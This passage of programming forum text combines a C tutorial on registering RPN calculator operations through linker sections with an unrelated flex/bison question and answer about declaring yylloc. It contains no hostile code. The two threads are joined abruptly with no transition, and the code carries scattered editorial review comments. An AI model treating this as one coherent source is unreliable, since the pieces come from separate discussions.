so you can enumerate all info structures. For example,
/*
 * Prints how many info structures were collected, then lists the key and
 * value of each. The key is read through __start_info[] and the value
 * through INFO() to show both access forms.
 */
int main(void)
{
    const size_t total = NUM_INFO;

    printf("There are %zu info structures:\n", total);
    for (size_t idx = 0; idx < total; idx++) {
        const long key = __start_info[idx].key;
        const long val = INFO(idx)->val;

        printf(" %zu. key=%ld, val=%ld\n", idx, key, val);
    }
    return EXIT_SUCCESS;
}
For illustration, I used both the __start_info[] array access (you can obviously #define SOMENAME __start_info if you want, just make sure you do not use SOMENAME elsewhere in main.c, so you can use SOMENAME[] as the array instead), as well as the INFO() macro.
Let's look at a practical example, an RPN calculator.
We use section ops to define the operations, using facilities defined in ops.h:
#ifndef OPS_H
#define OPS_H
#include <stdlib.h>
#include <errno.h>
/* Alignment attribute applied to struct op: 16 bytes on LP64 targets,
   8 bytes on ILP32 targets, nothing otherwise. An ALIGN_SECTION defined
   before this point takes precedence. */
#ifndef ALIGN_SECTION
#if defined(__LP64__) || defined(_LP64)
#define ALIGN_SECTION __attribute__((__aligned__(16)))
#elif defined(__ILP32__) || defined(_ILP32)
#define ALIGN_SECTION __attribute__((__aligned__(8)))
#else
#define ALIGN_SECTION
#endif
#endif
/* Growable stack of doubles used by the calculator. */
typedef struct {
size_t maxsize; /* Number of values allocated for */
size_t size; /* Number of values in stack */
double *value; /* Values, oldest first */
} stack;
/* Empty stack with nothing allocated. */
#define STACK_INITIALIZER { 0, 0, NULL }
/* One calculator operation, collected in the "ops" section. */
struct op {
const char *name; /* Operation name */
const char *desc; /* Description */
int (*func)(stack *); /* Implementation */
} ALIGN_SECTION;
/* OPS_NAME(n) builds the identifier op_<n>_struct. The OPS_DUMMY()
   indirection lets `counter` be macro-expanded before ## pastes it. */
#define OPS_NAME(counter) OPS_CAT(op_, counter, _struct)
#define OPS_CAT(a, b, c) OPS_DUMMY() a ## b ## c
#define OPS_DUMMY()
/* Defines a uniquely named static struct op in section "ops". Note the
   argument order (name, func, desc) versus the member order (name, desc, func). */
#define DEFINE_OP(name, func, desc) \
static struct op OPS_NAME(__COUNTER__) \
__attribute__((__used__, __section__("ops"))) = { name, desc, func }
/*
 * Checks that the stack holds at least `num` values.
 * Returns 0 if so, ENOENT if it holds fewer, EINVAL if `st` is NULL.
 */
static inline int stack_has(stack *st, const size_t num)
{
    if (st == NULL)
        return EINVAL;

    return (st->size >= num) ? 0 : ENOENT;
}
/*
 * Removes the newest value from the stack and, when `to` is not NULL,
 * stores it there.
 * Returns 0 on success, ENOENT if the stack is empty, EINVAL if `st` is NULL.
 */
static inline int stack_pop(stack *st, double *to)
{
    size_t top;

    if (st == NULL)
        return EINVAL;
    if (st->size == 0)
        return ENOENT;

    top = st->size - 1;
    st->size = top;
    if (to != NULL)
        *to = st->value[top];
    return 0;
}
/*
 * Appends `val` to the stack, enlarging the value array with realloc()
 * when it is full.
 * Returns 0 on success, ENOMEM if the array cannot grow (the stack is left
 * unchanged), EINVAL if `st` is NULL.
 */
static inline int stack_push(stack *st, double val)
{
    if (st == NULL)
        return EINVAL;

    if (st->size >= st->maxsize) {
        /* new capacity: size rounded up by the (size | 127) + 129 rule */
        const size_t grown = (st->size | 127) + 129;
        double *bigger = realloc(st->value, grown * sizeof (double));

        if (bigger == NULL)
            return ENOMEM;
        st->value = bigger;
        st->maxsize = grown;
    }

    st->value[st->size] = val;
    st->size++;
    return 0;
}
#endif /* OPS_H */
The basic set of operations is defined in ops-basic.c:
#include "ops.h"
/*
 * Replaces the newest value on the stack with its negation.
 * Returns 0 on success, otherwise the error reported by stack_pop() or
 * stack_push().
 */
static int do_neg(stack *st)
{
    double operand;
    const int status = stack_pop(st, &operand);

    if (status != 0)
        return status;
    return stack_push(st, -operand);
}
/*
 * Replaces the two newest values with (newest + previous).
 * Returns 0 on success, otherwise the error reported by stack_has().
 */
static int do_add(stack *st)
{
    const int status = stack_has(st, 2);
    double *pair;

    if (status != 0)
        return status;

    pair = &st->value[st->size - 2];    /* pair[0] = previous, pair[1] = newest */
    pair[0] = pair[1] + pair[0];
    st->size--;
    return 0;
}
/*
 * Replaces the two newest values with (newest - previous).
 * Returns 0 on success, otherwise the error reported by stack_has().
 */
static int do_sub(stack *st)
{
    const int status = stack_has(st, 2);
    double *pair;

    if (status != 0)
        return status;

    pair = &st->value[st->size - 2];    /* pair[0] = previous, pair[1] = newest */
    pair[0] = pair[1] - pair[0];
    st->size--;
    return 0;
}
/*
 * Replaces the two newest values with (newest * previous).
 * Returns 0 on success, otherwise the error reported by stack_has().
 */
static int do_mul(stack *st)
{
    const int status = stack_has(st, 2);
    double *pair;

    if (status != 0)
        return status;

    pair = &st->value[st->size - 2];    /* pair[0] = previous, pair[1] = newest */
    pair[0] = pair[1] * pair[0];
    st->size--;
    return 0;
}
/*
 * Replaces the two newest values with (newest / previous).
 * Returns 0 on success, otherwise the error reported by stack_has().
 */
static int do_div(stack *st)
{
    const int status = stack_has(st, 2);
    double *pair;

    if (status != 0)
        return status;

    pair = &st->value[st->size - 2];    /* pair[0] = previous, pair[1] = newest */
    pair[0] = pair[1] / pair[0];
    st->size--;
    return 0;
}
/* Register the basic operations: name, implementation, description. */
DEFINE_OP("neg", do_neg, "Negate current operand");
DEFINE_OP("add", do_add, "Add current and previous operands");
DEFINE_OP("sub", do_sub, "Subtract previous operand from current one");
DEFINE_OP("mul", do_mul, "Multiply previous and current operands");
DEFINE_OP("div", do_div, "Divide current operand by the previous operand");
The calculator expects each value and operand to be a separate command-line argument for simplicity. Our main.c contains operation lookup, basic usage, value parsing, and printing the result (or error):
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>
#include "ops.h"
/* Linker-provided symbols marking the start and end of the "ops" section. */
extern struct op __start_ops[];
extern struct op __stop_ops[];
/* Number of struct op objects in the section. */
#define NUM_OPS ((size_t)(__stop_ops - __start_ops))
/*
 * Runs the operation called `opname` on the stack.
 * Returns the operation's own result, ENOTSUP when no operation has that
 * name, or EINVAL when either argument is NULL.
 */
static int do_op(stack *st, const char *opname)
{
    struct op *candidate;

    if (st == NULL || opname == NULL)
        return EINVAL;

    for (candidate = __start_ops; candidate < __stop_ops; candidate++) {
        if (strcmp(opname, candidate->name) == 0)
            return candidate->func(st);
    }
    return ENOTSUP;
}
static int usage(const char *argv0)
{
struct op *curr_op;
fprintf(stderr, "\n");
fprintf(stderr, "Usage: %s [ -h | --help ]\n", argv0);
fprintf(stderr, " %s RPN-EXPRESSION\n", argv0);
fprintf(stderr, "\n");
fprintf(stderr, "Where RPN-EXPRESSION is an expression using reverse\n");
fprintf(stderr, "Polish notation, and each argument is a separate value\n");
fprintf(stderr, "or operator. The following operators are supported:\n");
for (curr_op = __start_ops; curr_op < __stop_ops; curr_op++)
fprintf(stderr, "\t%-14s %s\n", curr_op->name, curr_op->desc);
fprintf(stderr, "\n");
return EXIT_SUCCESS;
}
/*
 * Evaluates the RPN expression given as command-line arguments.
 *
 * Each argument that parses completely as a number is pushed; every other
 * argument is looked up as an operation. Exactly one value must remain at
 * the end: it is printed to stdout and EXIT_SUCCESS is returned. Any error,
 * or a stack holding zero or several values, is reported on stderr with
 * EXIT_FAILURE. Without arguments, or with -h / --help, the usage text is
 * shown.
 */
int main(int argc, char *argv[])
{
    stack all = STACK_INITIALIZER;
    double val;
    size_t i;
    int arg, err;
    char dummy;

    if (argc < 2 || strcmp(argv[1], "-h") == 0 || strcmp(argv[1], "--help") == 0)
        return usage(argv[0]);

    for (arg = 1; arg < argc; arg++) {
        const char *token = argv[arg];

        /* exactly one conversion means a number with nothing after it */
        if (sscanf(token, " %lf %c", &val, &dummy) == 1) {
            err = stack_push(&all, val);
            if (err) {
                fprintf(stderr, "Cannot push %s to stack: %s.\n", token, strerror(err));
                return EXIT_FAILURE;
            }
            continue;
        }

        err = do_op(&all, token);
        if (err == ENOTSUP) {
            fprintf(stderr, "%s: Operation not supported.\n", token);
            return EXIT_FAILURE;
        }
        if (err) {
            fprintf(stderr, "%s: Cannot perform operation: %s.\n", token, strerror(err));
            return EXIT_FAILURE;
        }
    }

    if (all.size < 1) {
        fprintf(stderr, "No result.\n");
        return EXIT_FAILURE;
    }
    if (all.size > 1) {
        fprintf(stderr, "Multiple results:\n");
        for (i = 0; i < all.size; i++) {
            fprintf(stderr, " %.9f\n", all.value[i]);
        }
        return EXIT_FAILURE;
    }

    printf("%.9f\n", all.value[0]);
    return EXIT_SUCCESS;
}
Note that if there were many operations, constructing a hash table to speed up the operation lookup would make a lot of sense.
Finally, we need a Makefile to tie it all together:
CC := gcc
CFLAGS := -Wall -O2 -std=c99
LDFLAGS := -lm
# Every ops-*.c file in the directory is compiled and linked in.
OPS := $(wildcard ops-*.c)
OPSOBJS := $(OPS:%.c=%.o)
PROGS := rpncalc
.PHONY: all clean
all: clean $(PROGS)
clean:
	rm -f *.o $(PROGS)
%.o: %.c
	$(CC) $(CFLAGS) -c $^
# $@ is the target name; the "#" seen here before started a comment and
# left "-o" without an argument.
rpncalc: main.o $(OPSOBJS)
	$(CC) $(CFLAGS) $^ $(LDFLAGS) -o $@
Because this forum does not preserve Tabs, and make requires them for indentation, you probably need to fix the indentation after copy-pasting the above. I use sed -e 's|^ *|\t|' -i Makefile
If you compile (make clean all) and run (./rpncalc) the above, you'll see the usage information:
Usage: ./rpncalc [ -h | --help ]
./rpncalc RPN-EXPRESSION
Where RPN-EXPRESSION is an expression using reverse
Polish notation, and each argument is a separate value
or operator. The following operators are supported:
div Divide current operand by the previous operand
mul Multiply previous and current operands
sub Subtract previous operand from current one
add Add current and previous operands
neg Negate current operand
and if you run e.g. ./rpncalc 3.0 4.0 5.0 sub mul neg, you get the result -3.000000000 (sub leaves 5 - 4 = 1, mul gives 1 * 3 = 3, and neg negates it).
Now, let's add some new operations, ops-sqrt.c:
#include <math.h>
#include "ops.h"
/*
 * "sqrt" operator: pop one value from the stack and push its square root.
 *
 * Returns whatever stack_pop() reported if the pop fails (nonzero);
 * otherwise returns the result of pushing sqrt(value) back.
 */
static int do_sqrt(stack *st)
{
    double operand;
    int err = stack_pop(st, &operand);

    if (err != 0)
        return err;

    return stack_push(st, sqrt(operand));
}
DEFINE_OP("sqrt", do_sqrt, "Take the square root of the current operand");
Because the Makefile above compiles all C source files beginning with ops- into the final binary, the only thing you need to do is recompile the source: make clean all. Running ./rpncalc now outputs
Usage: ./rpncalc [ -h | --help ]
./rpncalc RPN-EXPRESSION
Where RPN-EXPRESSION is an expression using reverse
Polish notation, and each argument is a separate value
or operator. The following operators are supported:
sqrt Take the square root of the current operand
div Divide current operand by the previous operand
mul Multiply previous and current operands
sub Subtract previous operand from current one
add Add current and previous operands
neg Negate current operand
and you have the new sqrt operator available.
Testing e.g. ./rpncalc 1 1 1 1 add add add sqrt yields 2.000000000, as expected.
I'm new to flex and bison so bear with me. I'm trying to use yylloc in yyerror to print out where the error occurs along with the filename. I know that this requires me to redefine YYLTYPE to include a char* filename that I can use to keep track of the filename. The Flex and Bison book I have recommends using the YY_USER_ACTION macro to initialize the YYLTYPE in the .l file, so I included the following in it:
/* Executed before every scanner action: stores the file, line and column
 * span of the current token in yylloc, then advances yycolumn past it.
 * NOTE(review): `filename` is not declared in the code shown with this
 * question (need.h declares `name`) -- confirm which variable is intended. */
#define YY_USER_ACTION yylloc.filename = filename; yylloc.hel = 0; \
yylloc.first_line = yylloc.last_line = yylineno; \
yylloc.first_column = yycolumn; yylloc.last_column = yycolumn+yyleng-1; \
yycolumn += yyleng;
but when I try to compile the project, I get the error that yylloc is undeclared.
I've tried the solution offered by Chris Dodd in this question, but it hasn't helped me to resolve the issue. Any and all help in resolving this error is much appreciated.
Here's the full code in .l:
%option noyywrap nodefault yylineno case-insensitive
%{
#include "need.h"
#include "numbers.tab.h"

/* Column of the next unread character on the current line (1-based). */
int yycolumn = 1;

/* Executed before every action: stamp yylloc with the token's file, line
 * and column span, then advance yycolumn past the token.  The input name
 * comes from `name`, the variable need.h declares for it. */
#define YY_USER_ACTION yylloc.filename = name; yylloc.hel = 0; \
    yylloc.first_line = yylloc.last_line = yylineno; \
    yylloc.first_column = yycolumn; yylloc.last_column = yycolumn+yyleng-1; \
    yycolumn += yyleng;
%}
Integers [-]?(0|[1-9][0-9]*)
Float [.][0-9]+
Exp [eE][-]?(0|[1-9][0-9]*)
Octal [-]?(00|0[1-7][0-7]*)
Hexa [-]?(0[xX][0-9A-F]+)
tomsNotNumbers [^ \t\n\v\f\r]+
%%
{Integers}{Float}?{Exp}? {
    printf("%s is a number.\n", yytext);
    possibleNumbers++; // increment by 1 as an input was given -M
    actualNumbers++; // increment by 1 as an input did match our pattern -M
}
{Octal} {
    printf("%s is a number.\n", yytext);
    possibleNumbers++; // increment by 1 as an input was given -M
    actualNumbers++; // increment by 1 as an input did match our pattern -M
}
{Hexa} {
    printf("%s is a number.\n", yytext);
    possibleNumbers++; // increment by 1 as an input was given -M
    actualNumbers++; // increment by 1 as an input did match our pattern -M
}
{tomsNotNumbers} {
    printf("%s is not a number.\n", yytext);
    yyerror(warning, "This isn't a number.");
    possibleNumbers++; // increment by 1 as an input was given -M
    failedNumbers++; // increment by 1 as the input has failed to match our patterns -M
}
[\n]    { yycolumn = 1; /* a new line starts again at column 1 */ }
.       /*Do nothing for anything else*/
%%
.y is just empty for now, only has an include for need.h and one for .tab.h
The need.h:
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
/* Scanner tallies, reported by main() once yylex() returns.
 * NOTE(review): these are definitions, not extern declarations; including
 * this header from more than one translation unit will define them twice. */
int possibleNumbers = 0; /* every input token examined, number or not */
int actualNumbers = 0;   /* tokens that matched one of the number patterns */
int failedNumbers = 0;   /* tokens that matched none of the number patterns */
/*
 * Location record for a token or grouping: the usual first/last line and
 * column span, extended with the file name and an error-severity marker.
 */
struct YYLTYPE
{
    /* where the span starts */
    int first_line;
    int first_column;
    /* where the span ends */
    int last_line;
    int last_column;
    /* which file the span belongs to */
    char *filename;
    /* severity marker: 0 = no errors, 1 = warning, 2 = error, 3 = fatal */
    int hel;
};
typedef struct YYLTYPE YYLTYPE;
/* Name of the input reported in diagnostics: main() stores argv[1] or
 * "(stdin)" here and yyerror() prints it.  Introduced for test purposes. */
char *name;
/* Marks YYLTYPE as already declared, so the custom struct is the one used. */
#define YYLTYPE_IS_DECLARED 1

/*
 * Compute the location of a grouping (Current) from its N right-hand-side
 * locations.  With N > 0 the span runs from the start of RHS element 1 to
 * the end of element N, and filename/hel are copied from element 1.  With
 * N == 0 the span collapses to the end of RHS element 0, filename becomes
 * NULL and hel becomes 0.
 */
#define YYLLOC_DEFAULT(Current, Rhs, N)                                   \
    do {                                                                  \
        if (N) {                                                          \
            (Current).first_line   = YYRHSLOC (Rhs, 1).first_line;        \
            (Current).first_column = YYRHSLOC (Rhs, 1).first_column;      \
            (Current).last_line    = YYRHSLOC (Rhs, N).last_line;         \
            (Current).last_column  = YYRHSLOC (Rhs, N).last_column;       \
            (Current).filename     = YYRHSLOC (Rhs, 1).filename;          \
            (Current).hel          = YYRHSLOC (Rhs, 1).hel;               \
        } else { /* empty RHS */                                          \
            (Current).last_line    = YYRHSLOC (Rhs, 0).last_line;         \
            (Current).first_line   = (Current).last_line;                 \
            (Current).last_column  = YYRHSLOC (Rhs, 0).last_column;       \
            (Current).first_column = (Current).last_column;               \
            (Current).filename     = NULL;                                \
            (Current).hel          = 0;                                   \
        }                                                                 \
    } while (0)
/* Severity of a diagnostic; values start at 1 and increase with severity. */
enum errorSeverity
{
    warning = 1,
    error = 2,
    fatal = 3
};
typedef enum errorSeverity errorLevel;
/*
 * Print a diagnostic on stderr: the input name, a severity label, the line
 * number from yylloc.first_line, the caller's printf-style message and a
 * trailing newline.
 *
 * errlvl  severity of the diagnostic; selects the label
 * s       printf-style format string for the message
 * ...     arguments consumed by s
 */
void yyerror(errorLevel errlvl, char *s, ...)
{
    static const char *const errLvls[3] = {"Warning", "Error", "Fatal"};
    /* Guard the table lookup so an out-of-range severity cannot index past it. */
    const char *label = (errlvl >= warning && errlvl <= fatal)
                            ? errLvls[errlvl - 1]
                            : "Unknown";
    va_list ap;

    va_start(ap, s);
    /* The line number is an int, so it is printed with %d.  (%n would expect
     * an int * to store into, which is undefined behaviour with an int.) */
    fprintf(stderr, "%s: %s: line %d: ", name, label, yylloc.first_line);
    vfprintf(stderr, s, ap);
    fprintf(stderr, "\n");
    va_end(ap); /* every va_start needs a matching va_end */
}
/*
 * Scan the file named by argv[1] (or the scanner's default input when no
 * argument is given, reported as "(stdin)") and print how many tokens were
 * and were not numbers.
 *
 * Returns 0 after the report is printed; exits with status 1 if the input
 * file cannot be opened.
 */
int main(int argc, char **argv)
{
    /* argv[argc] is a null pointer, and passing NULL to %s is undefined,
     * so substitute a placeholder for any missing argument. */
    printf("argv[0] = %s, argv[1] = %s.\n",
           argc > 0 ? argv[0] : "(null)",
           argc > 1 ? argv[1] : "(null)");
    if(argc > 1)
    {
        if((yyin = fopen(argv[1], "r")) == NULL)
        {
            perror(argv[1]);
            exit(1);
        }
        name = argv[1];
    } else
        name = "(stdin)";
    printf("Filename1: %s", name);
    yylex();
    printf("Filename2: %s", name);
    // print out the report. -M
    printf("Out of %d possible numbers, there were %d numbers, and %d not numbers.\n", possibleNumbers, actualNumbers, failedNumbers);
    return 0;
}
Since yylloc is normally defined in the bison-generated parser, not having a bison input file is going to be a bit of a nuisance.
Bison will define yylloc in the generated parser, and place a declaration in the generated header file, if:
You include the directive %locations in the bison prologue, or
You reference a location (@n for some n) in any bison action.
It is generally preferred to add the directive in case there is no explicit reference to a location in any rule.
As Chris Dodd says in the linked question, it is important to include the definition of YYLTYPE before #includeing the bison-generated header file. Alternatively, you could insert the definition of the structure, or an appropriate #include, directly in the bison prologue in a %code requires section. %code requires sections are copied to the generated header, so that will obviate the need to worry about the definition in the flex file.
By the way, I think you meant to use YY_USER_INIT to initialize yylloc. The expansion of YY_USER_INIT is executed only once, before the flex scanner's own initialization. The expansion of YY_USER_ACTION is executed before every scanner action (including empty actions), and is likely to be of use to update the yylloc structure with the current token.